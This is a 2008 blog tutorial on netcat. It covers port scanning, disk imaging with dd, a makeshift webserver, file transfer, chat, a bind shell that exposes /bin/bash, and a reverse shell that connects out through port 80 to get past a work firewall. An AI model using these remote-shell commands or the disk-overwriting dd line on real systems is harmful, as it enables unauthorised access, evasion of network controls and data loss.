Tuesday, December 9, 2008

NetCat! RAWR!

Big time in tiny town.

So this is a story about a small program that has a myriad of different uses. This tool is called netcat. To start out I am going to go over some of the more practical uses of netcat. The most common, and probably best known, use is netcat as a simple port scanner.

nc -v -w 1 localhost -z 1-3000


This example scans localhost for any open ports in the range of 1 to 3000 (-z tells netcat to just check whether each port accepts a connection, without sending any data, and -w 1 makes it give up on each port after a second). Pretty simple eh? Try it on your local machine, you might be surprised what is open. Unless you are a paranoid freak who uses hardened Linux with every port closed so the aliens can't invade your hard drive to steal your password to your TiVO to read your mind through television waves.

Ok, the aliens aside, this next example I haven't really found a practical use for as of yet, but I could see it being helpful in a pinch. We are going to use netcat to make a copy of a hard drive over the network with the aid of dd.

Server:
nc -l -p 9000 | dd of=/dev/sda

Client:
dd if=/dev/sda | nc 192.168.0.1 9000


To explain what is going on here: first we create a netcat server that listens on port 9000 and pipe its output to dd with the output set to /dev/sda (the hard drive we want to write the image to). Now we set up the client by using dd to read the disk we want copied and piping its output to netcat, which connects to our server on port 9000. Make sure to be careful if you try this, we don't want anyone to accidentally nuke an important drive.

Another simple little thing you can do with netcat is create a makeshift webserver to serve up some content.

One shot single connection:
nc -l -p 80 -q 1 < darkpages.html

Accept multiple connections:
while true; do nc -l -p 80 -q 1 < stuff.html; done


This is a pretty hacky way to do this sort of thing (netcat just dumps the raw file with no HTTP headers, and binding port 80 needs root), but it would work. Now you can do this sort of thing a lot prettier with socat, but that is a subject for a post of its own.
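Here is an added example of my own (not from the original post) that builds on the webserver trick above: a small shell script that wraps the file in proper HTTP headers, including a Content-Length, before handing it to netcat, so browsers get a real response instead of a bare file. The function names http_response and serve_loop are mine, and the script assumes the same Debian-style netcat the one-liners above use (-l -p and -q).

```shell
#!/bin/sh
# Added example: a slightly less hacky netcat webserver.
# http_response prints a complete HTTP/1.0 response for one file;
# serve_loop feeds that to netcat, one connection per iteration.

# Print headers + body for FILE. Second arg overrides the Content-Type.
http_response() {
    file="$1"
    ctype="${2:-text/html}"
    if [ ! -r "$file" ]; then
        # Missing or unreadable file: answer 404 instead of an empty reply
        printf 'HTTP/1.0 404 Not Found\r\nContent-Length: 0\r\nConnection: close\r\n\r\n'
        return 1
    fi
    length=$(wc -c < "$file" | tr -d ' ')   # tr strips padding some wc builds add
    printf 'HTTP/1.0 200 OK\r\n'
    printf 'Content-Type: %s\r\n' "$ctype"
    printf 'Content-Length: %s\r\n' "$length"
    printf 'Connection: close\r\n\r\n'
    cat "$file"
}

# Serve FILE on PORT forever; each nc handles exactly one connection,
# exactly like the while/true one-liner in the post (assumes -p and -q work).
serve_loop() {
    port="$1"; file="$2"
    while true; do
        http_response "$file" | nc -l -p "$port" -q 1
    done
}
```

Run it as `serve_loop 8080 darkpages.html` to avoid needing root for port 80.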

Now let's see what else there is to cover here. Ah yes, I always forget about this one, but it's not the most useful as there are MANY other tools to aid in something like this on Linux. If you haven't guessed, I am talking about using netcat to transfer large files.

Server:
nc -lp 1337 > file.gz

Client:
nc -w 1 192.168.0.10 1337 < file.gz


Ok, as you can tell this is very similar to the previous example using dd. First we create our server, which writes to our destination file. Next we create the client, which is fed our source file and connects to the server. The "-w 1" closes the connection once the file is done transferring (it is a timeout on how long netcat waits for more data). Ok so since this is pretty useless I am going to kick it up a notch just for fun =).

Server:
nc -lp 1337 | pv | gunzip > file

Client:
cat file | gzip | nc -w 1 192.168.0.10 1337


Now in this example we are compressing the data on the fly on the client side. On the server side we pipe the output through pv so that we get a nice little display of the amount of data transferred and the current transfer speed, and then through gunzip to uncompress on the fly.

Another silly thing that can be done with netcat is using it as a simple chat server. Granted this isn't pretty, but it would get the job done if you needed to chat it up without installing other crap.

Server:
nc -lp 9000

Client:
nc 192.168.0.10 9000


Either you or your friend starts the server and the other one starts the client, then you type. Yes, it's that simple!

I guess I should cover the more advanced uses now. You can use netcat as a light telnet-style server by doing something similar to the following.

Server:
nc -lp 1337 -e /bin/bash

Client:
nc 192.168.0.10 1337


Once you have created the server you can connect and use any commands you normally would in bash; it's pretty cool I think. (The -e flag only exists in some netcat builds, such as Debian's netcat-traditional; the OpenBSD version leaves it out.) Now a spin-off of this would be what is called the reverse telnet server. What is a reverse telnet server? I am glad you asked =). Let's say your work firewall is locked down and you can't poke any hole to be able to access your work server from outside of work, but you can access the internet via port 80. Well you are in LUCK!

Server:
nc -lp 80

Client:
nc 192.168.0.10 80 -e /bin/bash


Now, how this works is you create the server on your home machine, listening for connections on port 80 since we know our work firewall will allow port 80. Ok now the cool part: from the server behind the firewall we connect out to our home PC but tell netcat that /bin/bash will handle any commands that come back over the connection. Ok we are connected, and from our home machine we can now run commands directly on the work server!

Well I think this sums up this blog post. I hope you all learned a lot and find netcat as fun as I do =)! Please feel free to leave any comments about this blog.